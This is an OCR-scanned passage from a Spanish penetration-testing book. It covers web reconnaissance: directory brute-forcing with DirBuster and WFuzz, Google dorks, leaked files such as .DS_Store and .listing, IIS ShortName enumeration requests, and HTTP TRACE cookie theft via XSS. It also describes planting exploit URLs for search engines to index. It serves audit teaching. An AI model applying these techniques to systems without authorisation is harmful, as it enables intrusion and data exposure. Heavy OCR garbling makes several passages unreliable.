/wordpress/wp-content/plugins/resume-submis...  200 


Current  speed:  0  requests/sec 

Average  speed:  (T)  230,  (C)  227  requests/sec 

Parse  Queue  Size:  0 

Total  Requests:  2534/2629556 

Time  To  Finish:  03:12:52 _ 


Scanning 

Waiting 

Waiting 

Waiting 

WaltIna 

Waiting  I 

Waiting 

Waiting 

Waiting 

Waiting 

Waiting 

Waiting 

Waiting 

Waiting 


{Select  and  right  click  for  more  options) 
Current  number  of  running  threads:  10 


I  Change  | 


Fig.  3.04:  Ejccucion  de  DirBusier 


Oira  dc  las  herramientas  estrella  para  realizar  este  tipo  de  acciones  es  IVFiizz.  Esta  heiramienta  esta 
disehada  para  realizar  hruteforcing  a  aplicaciones  web  y  puede  ser  iitilizacia  para  encontrar  recursos 
no  cnlazados,  como  por  ejemplo  directorios,  servlets  o  scripts,  realizar  fuerza  bruta  de  peticiones 
GET  y  POST  con  parametros  con  dislinlas  inyecciones  y  realizar  fuerza  bruta  de  parametros  de 
rornuilario.  Ademas,  dicha  heiTamienta  permite  realizar  /i/zz//7g,  lo  cual  hace  mas  eompleta  la 
herramienta. 

(ji.xisten  mas  vias?  Realmente  cxisien  multitud  de  vias  mas  para  obtener  informacion.  Ademas.  se 
puede  decir  que  con  las  nuevas  tecnologias  cada  dia  surgen  nuevas  vias  para  obtener  infonnacion  de 
elementos,  activos,  direcciones  URL.  etcetera,  que  pueden  ayudar  al  auditor  a  conocer  cn  profundidad 
el  perimelro.  y  en  este  caso  la  estructura  web,  de  la  organizacion. 

Una  vez  explicadas  las  tecnicas  por  excelencia  como  son  el  cretwiing  y  la  fuerza  bruta,  se  detalla  a 
eoniiniiacion  otras  tecnicas  que  ban  ido  surgiendo  y  que.  cn  mayor  o  menor  medida.  proporciona 
inrormacion  aanalizar.  Algunas  deestas  tecnicas  se  encuentran  siempre  disponibles  en  las  aplicaciones 
web.  micnlras  que  otras  dependcran  de  la  existencia  de  un  ficbero.  una  mala  configuracion  o  un 
deseuido  del  administrador  del  sitio  o  del  servidor. 

I.os  buseadores  web  o  de  maquinas,  como  Sliodan  del  cual  se  ba  hablado  cn  el  capitulo  anterior, 
proporeionan  un  plus  interesante  para  una  auditoria.  Gracias  a  estas  beiramientas  se  pueden  descubrir 
gran  cantidad  de  activos  y  elementos  que  deben  ser  valorados  por  el  auditor.  El  crawling  y  la  fuerza 
bruia  de  directorios  pueden  ser  complementados  con  busquedas  a  traves  de  motores  de  busqueda. 

Id  uso  de  Google  o  Bing  son  escenarios  logicos  y  muy  utiles,  incluso  realizar  Google  Crawling  o 
Bing  Crawling  para  poder  encontrar  mas  elementos  de  interes.  Estos  buseadores  pueden  indexar 
nnllones  de  direcciones  URL  que  pueden  estar  en  estas  bases  de  datos  por  medio  de  un  enlace 
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directo  o  link  que  se  haya  puesto  en  alguna  otra  pagina  web  o,  simplemente,  porque  alguna  barra  del 
nlv^dor  haya  repojdo  dicha  diraccioa  URL.  El  auditor  deb.  revisa, ■  los  arclttvos  P» 

buscadores,  ya  que  existen  ciertos  errores  de  configuracion  que  pueden  haber  sido  utilizados  para 
indexar  archivos,  por  lo  que  esiaran  en  la  base  de  dates  del  buscador. 

Otras  vias  para  conseguir  mayor  informacion  son  el  fichero  robotsMt  y  sitemap.xml.  El 
ellos  guarda  rutas  a  ficheros  y  directorios  que  los  duenos  del  sitio  no  quieien  que  los  lobots  e^ 
buscadores  los  indexen.  De  este  modo  esta  tecnica  se  complementa  con  el  proceso  de  aa^^  mg 

un  sitio  web. 

Es  recomendable  visualizar  las  rutas  que  alii  se  esconden,  ya  que  en  algunas  ocasiones  los  resultados 
pueden  ser  sorprendentes.  Para  acceder  al  fichero  se  debe  acceder  a  http://sitio.com/robots.txt. 

El  archivo  sitemap.xml  tambien  recoge  varios  ficheros  y  contenidos  de  un  sitio.  Por 
son  direcciones  URL  piiblicas  con  informacion  para  tener  una  mejor  mdexacion  poi  parte  de  os 
buscadores.  Es  recomendable  obtener  estas  direcciones  URL  e  msertar  en  el  motor  de  craw  mg,  poi 
si  dicho  proceso  no  hubiera  local  izado  lo  que  se  alberga  en  dicho  fichero. 

Otra  via  es  la  utilizacion  de  servicios  como  Archive.org,  ya  que  en  muchas  ocasiones  cuando  se 
migra  un  sitio  web,  los  archivos  del  sitio  web  anterior  siguen  estando  en  el  propio  seiA'idoi.  (,Como 
se  puede  acceder  a  estos  ficheros?  Teniendo  las  rutas  o  buscandolas,  por  ello  se  puede  utihzai 
un  servicio  como  el  nombrado  anteriormente  el  dial  puede  proporcionar  una  gran  cantidad  de 
direcciones  URL  para  buscar. 

El  proceso  con  .Archive.org  es  sencillo.  En  primer  lugar  se  debe  hacer  crawling  con  las  copias  que 
pueden  ser  rescatadas  del  servicio,  analizar  las  direcciones  URL  que  se  obtiene  y,  por  ultimo,  generar 
un  fichero  de  diccionario  que  se  pueda  lanzar,  por  ejemplo  con  WFiizz. 

Otra  de  las  vias  para  cncontrar  elementos  es  la  denominada  DNS  Dictionaiy.  Esta  tecnica  se 
realiza  a  los  servidores  DNS  de  la  organizacion  y  consiste  en  lanzar  tuerza  bruta  contra  el  servidor 
preguntando  por  dominios  que  se  concatenan  con  el  dominio  de  la  organizacion. 

Por  ejemplo,  si  el  dominio  es  elevenpaths.com,  se  ejecuta  un  diccionario  sobre  dicho  doming 
preguntando  por  todas  las  palabras  del  diccionario  concatenadas  con  elevenpaths.com.  Algunos 
nombres  comunes  para  encontrar  nuevos  dominios  o  siibdominios  son  aclmm.elevenpaths.com, 
mail.eles’enpaths.com,  correo.eIevenpaths.com.  etcetera. 

PoC:  Algunos  trucos  en  Google 

En  este  apartado  se  ha  podido  comprobar  que  los  motores  de  biisqueda  pueden  ayudar,  y  ’ 

una  auditmia  web.  En  esta  piiieba  de  concepto  se  quiere  mostrar  algun  truco  que  puede  ser  utilizado 

en  Google. 

Como  ya  s.  ha  comentado  .n  .s«  libro.  exist,  div.rsid.d  d.  Do*  con  los  que  s.  pu.d.  cc»,s«air 
obtener  informacion  que  algunas  veces  supera  la  liccion.  En  este  caso  se  van  a  trata,  nn  par  d.  trucos 
que  existen  en  el  buscador. 
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En  primer  lugar  se  trata  el  truco  de  la  baiTa.  Con  este  pequeiio,  pero  poderoso,  truco  se  pueden 
obtener  sitios  web  que  se  encuentran  en  los  puertos  poco  usuales  para  las  organizaciones. 

Por  ejemplo,  si  se  quiere  encontrar  un  sitio  que  se  encuentra  en  el  puerto  9000  se  puede  conseguir 
facilmeiite  con  la  siguiente  construccion  .^ite :/.es: 9000/  consiguiQndo  que  se  encuentren  dominios 
.es  con  un  servidor  en  el  puerto  9000. 


Con  este  truco  se  puede  realizar  busquedas  de  servicios  como  camaras  IP,  impresoras,  proxies, 
paneles  de  administracion,  etcetera. 

Para  afinar  un  poco  mas  se  puede  mejorar  el  truco  de  la  barra  cambiando  el  puerto  especifico  por  un 
interrogante. 


El  resultado  seria  el  siguiente  site:/.es:/?/  y  se  consiguen  millones  de  resultados  en  el  buscador 
Google. 


Go  gle 


site;./.es:/7./ 


Web  Imagenes  Moticias  Sliop.cing  Maps  Mas-  Herranietnas  de  bOs'-ueda 


ApFOKimadamente  2.420  000  resultados  t0.20  segundosi 

Promccidn  dc  Gtsyls 

Prueba  las  Herramientas  para  webmasters  de  Google 

V/VAV  google. comAvebmaslers-' 

i.Eres  el  v^ebmaster  de  /.es:/??  Consigue  datos  de  indexacidn  y  ranking  de  Google 

El  Imparcial:  Dlario  liberal  e  Independiente 

w'//vV.elimparcial  esiGGSI*' 

El  Imparcial  diario  liberal  e  independiente  presidido  por  Luis  Iviaria  Anson 


Fig.  3.05:  Oblcncion  de  resultados  con  el  truco  dc  la  barra. 


F.n  algunas  ocasiones  este  tipo  de  buscadores  pueden  convertirse  en  annas.  Cuando  alguien  lee  que 
un  buscador  puede  ser  un  arma  puede  pensar  que  se  tiende  a  exagerar,  pero  en  algunas  ocasiones 
Google  puede  tomar  dicho  comporiamiento,  ya  que  se  puede  conseguir  que  el  buscador  se  comporte 
cn  una  herramienta  de  pentesting. 

Sc  propone  el  siguiente  caso  practico:  un  atacante  descubre  una  vulnerabilidad  en  un  sitio  web 
explotable  en  una  peticion  mediaiite  un  parametro  por  GET.  Para  evitar  su  local izacion,  o  hacerlo 
mas  complejo,  el  atacante  pide  a  los  buscadores,  en  este  caso  Google,  la  indexacidn  de  una  direccidn 
URL  con  el  exploit  en  el  parametro  GET. 

Otra  posibilidad  es  que  se  indexe  un  sitio  web  cuyo  eddigo  contiene  enlaces  o  links  a  dichos  e.xploits 
para  que  se  ejeculen.  Simplemente  con  la  visita  de  un  usuario,  o  del  propio  buscador  cuando  este 
realiza  su  trabajo,  desencadenada  el  ataqiie. 
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Un  ejemplo  de  este  concepto  se  puede  visualizar  en  la  siguieiite  imagen.  Se  han  hecho  distintas 
pruebas  con  direcciones  URL  maliciosas,  de  forma  que  Google  indexa  y  almacena  en  su  cache 
resultados  de  ejecutar  un  SQL  Injection. 


Gougle 


Icom 


Search 


Units  -  The  complementary  Page 

jospeh  almond  rudy  patata  kart  asfghjk  tina  13.  sandra  sandra  mane  tv.  carla  radio  peter 
■/■dieel  aina  spqd.  k1 

c 0  i^/c  Q  n ve  rt e  r  p h  [: '?  i d -  Q ^ u n  i  o  ii  .  ii  - 


Fig.  3.()6:  Resultados  de  SOU  cacheados  en  Google. 


En  otros  buscadores  esto  tambien  ocun-e.  y  es  algo  que  debe  tenerse  en  cuenta.  Logicamente,  estas 
acciones  no  son  nada  eticas,  por  lo  que  en  un  proceso  como  el  que  se  quiere  llevar  a  cabo  en  una 
organizacion  no  es  nada  recomendable,  pero  siempre  esta  bien  conocer  este  tipo  de  acetones. 


Fugas  de  informacion  y  malas  configuraciones 

En  este  apartado  se  especifican  mas  tecnicas  para  cnconlrar  mas  informacion  de  utilidad  para  el  auditor. 
Ademas.  esta  informacion  puede  provocar  fugas  de  informacion  debido  a  malas  configuraciones  o 
errores  cn  la  administracion  del  sitio. 

Existen  multiliid  de  ficheros  que  pueden  aportar  informacion.  A  continuacion  se  piesentan  algunos 
de  los  mas  encontrados  en  audilorias: 

-  Ficheros  .listing.  Son  creados  por  la  herramienta  wget,  y  vienen  siendo  un  Is  -  la  de  la 
carpeta  donde  se  ha  subido  o  donde  se  ban  descargado  determinados  ficheros.  No  tienen 
porque  ser  los  que  haya  en  dicho  directorio,  gracias  a  esta  pequeha  fuga  se  obtienen  nuevas 

direcciones  que  deben  serprobadas. 

Un  ejemplo  de  fichero  .listing  es  iittp.j/sitio.cow/ac/mm/.listing.  Una  forma  rapida  de  deteclar 
archivos  de  este  tipo  en  Google  es,  por  ejemplo.  utilizando  la  sigiiiente  busqueda  site:doininio. 
com  iniirl: listing. 


Fig.  3.07:  Oblencion  dc  ficheros  a  iravcs  de  im  .listing. 
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-  Los  directorios  abiertos  son  otra  fuente  de  informacion  y  nuevas  rutas  y  ficheros  a 
explorar.  Esta  via  complementa  nuevamente  a  tecnicas  como  el  crawling. 

Una  de  las  principales  caracterlsticas  de  este  tipo  de  eiTores  de  configuracion  es  que  empieza 
por  ''Jnde.x  Of'  y  que  permite  que  un  tisuario  pueda  recoiTer  carpetas  sin  necesidad  de 
conocerlas  o  que  esten  enlazadas  a  traves  del  propio  sitio.  Se  recomienda  evitar  este  tipo  dc 
configuraciones. 

-  Los  ficheros  .DS_Store  son  generados  por  la  aplicacion  Finder  de  Mac  OS  X  y  ha 
demostrado  ser  una  fuente  de  infonoacion  para  obtener  tanto  archivos  como  carpetas  de  un 
directorio. 

Cuando  un  administrador  manipula  carpetas  del  servidor  desde  su  Mac  OS X.  el  Finder  copia 
un  fichero  denominado  .DS_Store,  el  cual  alberga  informacion  relativa  al  directorio  que  se 
esta  manejando. 

Cuando  el  administrador  sale,  si  no  se  ha  tenido  cuidado  de  boirar  dicho  archivo,  este 
puede  ser  publico  situandose  en  la  nita  del  servidor  que  estuviera  siendo  manipulada  por  el 
administrador. 
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1 6_tmp622389 101  Docblob 

1 7  .jpgDocblobR^^^^^^  1 7_s  .jpgDocblob^^^^^^^l  7_ 

1 7_tmp5 1 6568529nocblob 

1 8  .jpgUocblob*^^^^^^!  8_s. jpgilocblob 
^^^^^^^18_tmp392278706nocblob 

Fig.  3.08:  Busqueda  de  .DS  Store  pe^r  Internet. 


-  Los  ficheros  thumhs.dh  tambien  almacenan  noinbres  de  archivos  de  los  (fmmhnails 
asociados  a  los  archivos  del  sistema  operativo  Windows  XF  o  Windows  2003. 

Puede  ser  interesante  tratar  dicha  informacion  para  conocer  mas  informacion  sobre  la  ruta  en 
la  que  se  encontro  dicho  archivo. 

-  Los  ficheros  desktop.ini  son  archivos  de  configuracion  de  una  carpela,  pero  aunque 
parezea  extrano  pueden  encontrarse  en  rutas  publicas  de  un  servidor. 
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C  D  mw.guidenetnet/deslctop.ini 


[ .  ShellClassIr.f  o] 

LccdlizedResourceNaine=S%5y3i:einRoou%\3ysteiii32\shell32  .  dll,  -21'77  5 

Ir.f  QTxp=S%3y3-ceitRoQt%\3y3t.err-32\3hell32  .  dll,  -12  6SS 
IconRe3Durce=%5y3teiri<.oot%\3y3ten'32\iinagere3 .  dll,  -115 
IcQrjFile=%3ysteiiLRoot%\sy3t:eii[i32\3hell32 .  dll 
IconIridex=-23  6  _ _ 

Fig.  3.09:  Desktop/mi  publico. 


Existen  distintos  repositorios  de  codigo  los  cuales  van  dejando  un  raslro  de  las  acciones 
que  se  van  realizando.  En  estos  repositories  suelen  encontrarse  ficheros  qiie  registran  los 
archives  subidos  o  actualizados  por  los  desarrolladores. 

For  ejemplo  subversion  o  biiildbot  son  autenticas  fiientes  de  inforinacion.  El  ejemplo  mas 
dare,  y  que  la  herramienta  FOCA  tiene  en  cuenta  es  el  tichero  .SVN/Entries.  Otros  repositories 
como  Git  tienen  sus  ficheros  tambien  interesantes  para  obtener  informacion.  Cada  repositorio 
de  codigo  debe  ser  analizado  en  busca  de  este  tipo  de  archives. 

-  Archives  de  Jog  de  servidores  FTP  como  Pure-FTPd o  WS_FTP  tambien  ayuda  a  obtener 
mas  rutas  y  elementos  a  comprobar.  Por  ejemplo.  si  se  busca  en  Googie  archives  del  tipo 
WS  FTP  tog  se  pueden  encontrar  bastantes,  lo  que  da  una  idea  de  todo  lo  que  se  puede 
encontrar  en  las  auditorias. 

-  Existen  otras  fugas  de  informacion  proporcionadas  por  paginas  por  detecto  de  lecnologias 
0  algunos  CMS. 

For  ejemplo  la  pagina  PHP  Info  proporciona  informacion  al  auditor  sobre  que  sistema  esta 
eJecLitando  la  aplicacion  web,  qu^  modulos  estan  cargados,  versiones  de  producto  de  PHP 
y  otras  aplicaciones.  Son  paginas  que  deberian  estar  deshabilitadas  por  delecto,  una  vez  la 
aplicacion  web  se  encuenlra  publicada  en  Internet.  Ocurre  lo  mismo  para  Tomcat.,  o  CMS 
como  Wordpress.  el  cual  dispone  por  defecto  de  la  direccion  http://dominio.com/readme. 
html.  Este  fichero  muestra  por  defecto  la  version  de  Wordpress  que  se  encuentra  instalado, 
por  lo  que  el  auditor  podria  buscar  un  exploit  o  fallos  conocidos  para  dicha  version. 

Los  mensajes  de  en*or  tambien  pueden  ayudar  a  conocer  rutas  internas  u  otras  del  sitio 
web.  Forzar  la  aparicion  del  error  404  en  aplicaciones  web  siempre  proporciona  informacion. 
Cabe  destacar  que,  por  ejemplo,  en  servidores  IIS  de  Microsoft  se  puede  encontrar  el  mode 
debug  habilitado  hacia  el  exterior,  lo  cual  proporciona  gran  cantidad  de  informacion  sobre 
el  fallo.  Con  este  error  se  obtienen  rutas  internas,  usuario,  detalles  de  la  aplicacion,  etcetera. 
Frovocar  errores  para  observar  el  comportamiento  es  algo  recomendable  en  las  auditorias. 

Cuando  el  servidor  es  un  Apache  con  el  Mod_Negotiation  habilitado  si  se  solicita  un 
fichero  que  no  existe  el  servidor  devuelve  un  listado  de  ficheros  que  se  Hainan  igual  que 
el  solicitado,  pero  con  distintas  extensiones.  Esta  via  es  perfecta  para  encontrar  backups 
de  ficheros.  For  ello,  si  se  conocen  ficheros  que  existen  en  el  servidor  puede  ser  realmente 
util  pedirlos  sin  extension  para  que  este  modulo  ofrezea  los  archivos  que  se  encuentran 
disponibles  con  dicho  nombre. 
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Gracias  a  ficheros  como  PHP  Info  se  puede  saber  si  dicho  modulo  se  encuentra  habilitado  en 
el  servidor.  Otra  tecnica  seria  la  prueba  y  error. 

^  GAO  www.nw5.noaa.gov/cllmate/l3mto. 

Multiple  Choices 

The  document  name  you  requested  (/cl jjnate/ianito.)  could  not  be  found  on  this  server. 

Available  documents: 

•  /climatc/13mto.php  (common  basenamc) 

•  /climatc/13mto.php.rmlc  fcommon  basename) 

•  /clLmatc/13mtQ.bk.php  fcommon  basenamc) 

Apache  Server  at  www.weai}i€r.gov  Port  80 

Fig.  3.10:  Descubriendo  urchivo.s  con  Mod_Negotialion. 


-  Otra  opcion  para  descubrir  un  mayor  numero  de  direcciones  URL  aprovechando  que  el 
servidor  4/x/c/?^  tiene  habilitado  el  mckliilo  Mod_User_Dir  Q'b  la  utilizacion  de  un  diccionario 
de  usuarios.  Con  este  diccionario  se  crean  rutas  del  estilo  liftp://dominio.com/--usuario.  El 
objetivo  es  verificar  la  existencia  de  dichos  usuarios,  logicamentc  puede  que  los  usuarios 
que  se  prueben  scan  conocidos  gracias  a  metadatos  de  ficheros  u  otro  proceso  rcalizado 
anteriormente. 

Otra  de  las  cosas  que  se  deben  comprobar  es  la  posibilidad  de  detcctar  los  ficheros  .login, 
.bashre,  .profile,  .bash jirofile  que  pueden  encontrarse  piiblicos.  Cualquier  archivo  que  pueda 
encontrarse  en  la  ruta  a  la  quo  apunta  $HOME. 

-  Cuando  hay  un  seiwidor  de  lidicrosoft  IIS  se  debe  probar  la  posibilidad  de  probar  a 
enumerar  los  nombres  con  formato  8;3  de  los  archivos  mediante  el  hug  IIS  Short  Name. 

-  Una  de  las  acciones  que  puede  apoitar  mucha  informacion,  sobre  todo  cuando  se  realiza 
la  inferencia  de  dicha  informacion,  es  la  deteccion  dc  metadatos  en  ficheros  piiblicos  de  las 
organizaciones.  Cuando  un  dominio  dispone  de  muchos  documentos,  lo  que  pueden  aportar 
los  metadatos  es  realmente  interesante.  Se  puede  obtener  gran  cantidad  de  usuarios,  .software, 
e-mails,  sistemas  operatives,  rutas  internas,  impresoras,  incliiso  geolocalizacion  en  el  caso 
de  alguna  imagen. 

Los  archivos  compilados  tambien  pueden  proporcionar  mas  direcciones  URL  que  auditar. 
Los  applets  de  Java  o  los  archivos  son  fuente  de  informacion.  Se  podria  incluso 
localizar  hasta  el  codigo  fiiente  en  ciertos  directories,  un  ejemplo  seria  con  la  fuerza  bnita 
por  diccionario  a  directories. 

La  FOCA  es  capaz  de  sacar  multitud  de  los  fallos  y  errores  enunciados  en  este  apartado,  per  lo 
que  es  recomendable  que  en  esta  parte  de  la  auditoria  el  pente.ster  la  utilice  para  obtener  mayor 
mlormacion  de  lo  que  haria  con  un  crem’ler  yuns.  heiTamienta  de  fuerza  bruta  a  directories.  Ademas. 
cs  recomendable  utilizar  una  herramienta  que  automatice  el  proceso,  ya  que  existe  multitud  de 
hcheros  y  modos  que  probar. 


uos  vi«u.  .eben  s„  obse.ados  ,  anabz^os  =n  ^  fas.  P— ™ 

l:^;a'pll“«os.ejen,pbbca^ 

Lrtados  qu.  aim  permit.  .1  sisl.ma  de  ficheros  de  Mcrosqf/  lf»«fo  - 

iQ„d  es  .1  sistem.  de  nombms  aconados?  La  berencia  de  los 

e„  los  sistemas  «W»».s  haee  que  sea  posibl.  poder  ae«de  a  "n  “ 

otras  palabras,  a  un  sist.ma  d.  archives  ae  Paede  acced  "^3“  J  „S,  p„, 

eareniido.  Esta  caraeteristica  esta  dispon.ble  en  P  '°  “ 

tanto  si  .1  fich.ro  se  .ncueatra  Como  si  no,  s.  genera  un  .nol  al  sol.ctatl  . 

El  servidoc  IIS  cuando  se  solicita  un  nombre  se  encuentra  se  conlinua 

proporcon.  un  error  404,  lo  cua  no  debena  gtreceidn  URL  de  man™ 

^rrse'^rgr.::™  4^0  S«e,uesr:  Enm^ 

se  ha  filtrado  el  caracter  . 

E„  earn  pnreba  d.  eoncep.o  se 

-.-s:r^,::^vrm:;r::::;:d::LneL.an.osieais,eeihch.roco^^ 


IIS  Version 


Result/EiTW  Message 


SJgtSa.'; 

HTTP  400  -  Bad  Request 


/lnvalid*~l*/aspx 

HTTP  404  -  File  not  found^ 


http  400  -  Bad  Request 


IIS7.)(.Net.2 
No  Error  Handling 


/lnvalid*~lV 


Error  (ide^  0x00000000* 


Page  contains: 

"Error  Code  0x80070002' 


Fig.  3.11:  Vias  para  explotar  la  vuincrabilidad  de  IIS  ShoriName. 
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Si  el  sitio  no  es  vulnerable  se  obtendra  siempre  el  mismo  mensaje,  y  es  facil  dctectarlo  porque  si 
se  utiliza  el  comodin  el  mensaje  sera  claro  '\A  potentially  dangerous  Request. Path  value  was 
detected  from  the  client  f^}. 

A  continuacion,  y  tras  la  explicacion,  se  comieiiza  con  la  pmeba  de  concepto.  Se  tonia  un  objetivo 
V  tras  realizar  una  pmeba  con  estas  peticiones  http://www.dominio.com/ap'^'- 1 .  V.aspx  y  http://\v\v\v. 
dominio.com/ac'^-1  ."^'/.aspx  se  obtienen  distintos  resultados.  Con  la  primera  peticion  se  obtiene  un 
had  request  por  lo  que  se  toma  como  que  el  fichero  no  existe,  mienlras  que  con  la  segunda  peticion 
se  obtiene  un  error  404,  por  lo  que  se  entiende  que  el  fichero  existe. 

Ahora.  una  vez  encontrado  un  fichero  se  precede  a  intentar  adivinar  algo  mas  del  nombre,  mediante 
al‘20  de  fuerza  bruta.  La  siguiente  peticion  es  http://www.dominio.eom/accesi-I.asp/.aspx  y  con  esta 
se  obtiene  un  error  404,  por  lo  que  se  sabe  que  existe,  aunque  el  nombre  del  fichero  no  esta  complete. 
Solo  se  pueden  descubrir  los  primeros  6  caracteres  del  nombre,  ya  que  los  dos  ultimos  deben  ser 
iiiilizados  por  ‘ -L’  y  luego  la  extension  de  3  letras. 

^  G  fi  Q  www|m^^|/accesl-l.asp/.a5px 


No  se  encuentra  la  pagina 

Puede  que  se  haya  quitado  la  pagina  que  esta  buscando^  que  haya  cambiado  su 
nombre  o  que  no  este  disponible  temporalmente. 

Fig.  3.12;  F.xiio  con  el  hiigde  IIS ShortName. 


Sc  puede  iitilizar  fuerza  bruta  basandose  en  lo  que  se  ha  encontrado  o  conoce  previamente.  Por  ello 
cs  importante  utilizar  herramientas  que  pennitan  la  automatizacion  del  proceso  complete,  desde  la 
tlclcccion  hasta  la  explotacion  y  obtencion  de  ficheros  que  no  .se  conocian.  Logicamente,  cs  posible 
quo  los  ficheros  que  se  encuentren  hayan  sido  encontrados  por  otra  via  expuesta  en  este  capitulo. 
pero  quiza  otros  no.  por  lo  que  siempre  es  interesanle  realizar  esta  comprobacion.  Ademas,  se  debe 
informar  cn  la  auditoria  si  se  detecta  esta  vuincrabilidad. 

Ilcrramicnlas  como  FOCA  o  IIS  ShortName  Scanner  Poc  proporcionan  la  automatizacion  para  esta 
iccnica,  por  lo  que  el  auditor  debera  utilizarlas  si  se  enfrenta  a  un  servidor  IIS. 

I  ocalizacioii  de  puntos  de  entrada 

Tras  realizar  pruebas  como  las  especificadas  anteriormente  para  conocer  el  maximo  niimero  de 
clcmcnios  de  la  organizacion,  se  debe  localizar  los  puntos  de  entrada.  Cuantos  mas  puntos  de  entrada, 
^nibicn  denominados  login  entty,  se  conozcan  mas  probabilidades  de  realizar  ataques  contra  el  los. 
or  Clio,  es  una  buena  recomendacion  colocar  estos  sitios  para  gestiones  administrativas  de  manera 
oculia.  Si  los  login  son  para  la  utilizacion  de  la  aplicacion  web  y  no  para  gestion,  logicamente,  no 
puede  recomendar  esto. 
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Los  paneles  de  administracion  deben  ser  diflciles  de  encontrar  y  no  estar  indexados  en  buscadores 
ni  encontrarse  excluidos  en  el  fichero  robots.lxU  porque  seria  tacilmente  localizable.  No  es 
recomendable  que  las  direcciones  URL  donde  se  alojan  scan  intuitivas,  ya  que  si  la  direccion  UR 
es  httpJIdoininio.  com/admin. 

Hay  que  tener  en  cuenta  y  valorar  si  los  login  estan  protegidos  por  conexiones  seguras  bajo  el 
protocolo  HTTPS.  Si  se  detecta  que  estos  login  se  realizan  sm  citrar  la  comunicacion  se  de  e  ener 
en  cuenta,  ya  que  la  recomendacion  es  que  exista  una  capa  SSL  para  fortificar  la  segundad  del 

usLiario  o  administrador. 


Metodos  HTTP 

Ya  durante  el  capitulo  anterior  se  trato  por  encinia  el  problema  de  los  metodos  inseguros  configurados 
en  los  servidores  web  como  ejemplo  de  una  prueba  de  concepto.  Desde  el  punto  de  v.sta  de  a 
administracion  de  sistemas  y  los  equipos  de  segundad,  se  entiende  que  hay  que  tenerlos  en  todo 
momento  presentes  y  en  cuenta,  por  lo  que  hay  que  verificar  cuales  son  los  metodos  que  estan 
pcmiitidos  y  cuales  son  los  que  estan  implementados. 

Con  cualquier  fallo  de  configuracion  de  un  sistema,  en  muchas  ocasiones  desde  el  punto  de  vista  de 
un  auditor,  o  del  lector  de  un  informe  de  resultados  de  un  proceso  de  auditona,  puede  parecer  que 
no  proporcionaran  ninguna  via  importante  que  lleva  a  buen  tenmno  un  proyecto  Az  pentestmg,  pero 
esta  claro  que  en  otras  ocasiones  si.  y  por  eso,  con  un  enfoque  de  algontmo  voraz,  deben  tenerse  muy 
en  cuenta  en  las  pruebas  seguridad. 

Como  ya  se  ha  dicho,  os  m^odos  HTTPm  un  serv'idor  web  pueden  estar  habilitados  o  implementados. 
pero  hay  una  diferencia  grande  entre  esas  dos  situaciones  que  se  trata  a  continuacion.  Para  com|Xobar 
que  metodos  puede  implementar  el  servidor  web  es  necesario  reahzar  una  conexion  HTTP  mediante 
el  metodo  OPTIONS.  En  este  proceso  el  servidor  puede  notificar  una  gran  variedad  de  metodos 
disponibles,  donde  puede  llamar  poderosamente  la  atencion  que  se  informe  que  el  metodo 
DELETE,  COPY 0  MOVE  se  encuentran  disponibles. 

Esta  notificacion  puede  suponer  un  gran  agujero  de  seguridad  en  el  serxudor,  ya  que  si  realmente  el 
metodo  PUTsq  encuentra  habilitado,  es  decir,  se  estan  procesando  y  ejecutando  las  peticiones  que 
lleguen  por  PUT,  se  podra  subir  archives  al  servidor  web,  con  el  consiguiente  nesgo  de  que  alguien 
suba  una  shell  al  sei'vidor. 

Es  muy  comiin  ver  que  se  devuelven  algunos  metodos  no  tan  llamativos  como  los  mencionados 
anteriormente,  por  ejemplo  el  metodo  TRACE.  Pero  lo  que  se  ha  comentado  antenormen 
es  importante,  puede  que  OPTIONS  proporcione  ciertos  metodos,  pero  hay  que  comprobar  qu 
realmente  se  encuentran  implementados  y  que  funcionan.  No  vale  de  mucho  que  se  iga  que 
esta  implementado,  si  al  realizar  la  prueba  no  se  consigue  el  objetivo. 

En  el  caso  del  metodo  TRACE,  disponerle  puede  ayudar  a  realizar  un  hijacking  de  cookies  HTTP- 
only  si  existiese  un  XSS  que  ayudase  en  el  proceso.  Es  un  caso  complejo,  pero  que  podna  darse. 
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request 

,  1 

headers  hex  | 

TRACE  /  HTTP/ 1.0 

1  +  II  <  II  >  1 

0  matches 

response 

1 

headers  hex  | 

HTTP/ 1.1  200  OK 

Date:  Tiled,  09  Nov  2011 

20:39:14  GHT 

Server :  Apache/  2.2.3  i  Red  Hat )  D AV/  2  inod_ j  k/'  1 .  2 , 2  7 

FrontPage/5. 0. 2 . 2635  PHP/5 .  1 . 6  inod_ssi/2 . 2 . 3  OpenSSL/0 . 9 ,  Sb 

Connection:  close 

1  Content-Type:  message/ http  | 

TRACE  /  HTTP/ 1.0 

0  matches 

Fig.  3.13:  Ejemplo  del  metodo  TRACE. 


/.Que  significa  el  flag  HTTP-only  dentro  de  una  cookie?  EsXt  flag  permite  que  la  cookie  no  sea 
acccsible  por  codigo  de  scripi,  por  lo  que  solo  se  enviara  en  conexiones  HTTP.  oQue  hace  el  metodo 
TR:\CE1  Este  metodo  lo  unico  que  realiza  es  devolver  cl  codigo  200  ante  una  pclicion  en  la  que  se 
copia  lo  que  se  le  ha  enviado  por  el  metodo  TRACE.  <*,C6mo  se  puede  saltar  la  medida  de  proteccion 
de  cookie  HTTP-ouhP 

El  autor  del  ataque  fue  Jeremiah  Grossman  y  propuso  que  si  un  servidor  web  tiene  habilitado  el 
metodo  TR.'iCE,  cuando  reciba  una  peticion  de  TRACE  en  la  respuesta  que  genera,  dicho  servidor, 
se  obtendra  un  codigo  de  respuesta  HTTP  200  y  en  el  cuerpo  de  la  respuesta  la  misina  cabecera 
TRACE. 

Ahora,  si  existiese  una  vulnerabilidad  de  tipo  XSS  en  una  aplicacion  web  que  se  ejecute  en  ese 
mismo  sen  idor  web,  se  puede  generar  desde  el  XSS  una  peticion  con  el  metodo  TILACE  invocando 
un  componente  que  pueda  lanzar  peticions  TRACE  -  los  navegadores  lo  tienen  prohibido  -para  poder 
robar  la  cookie  aunque  estuviese  marcada  con  HTTP-only. 

La  idea  es  sencilla,  el  navegador  no  va  a  permitir  acceder  por  medio  de  codigo  script  a  la  cookie, 
pero  cuando  se  realiza  la  peticion  HTTP  sera  el  mismo  quien  anada  la  cookie  de  la  sesion  a  la 
peticion.  Como  la  peticion  es  un  metodo  TRACE,  la  respuesta  generada  incluye  una  cookie,  pero  no 
eomo  lal  sino  como  parte  del  cuerpo  del  mensaje  y  podra  leerse  el  valor  de  dicha  cookie. 

Logicamente  el  usuario  victima  debe  caer  en  cl  XSS,  el  cual  generara  una  peticion  HTTP  con  el 
metodo  TRACE,  y  sera  desde  esta  nueva  peticion  la  que  hara  que  se  replique  la  cookie  en  el  cuerpo 
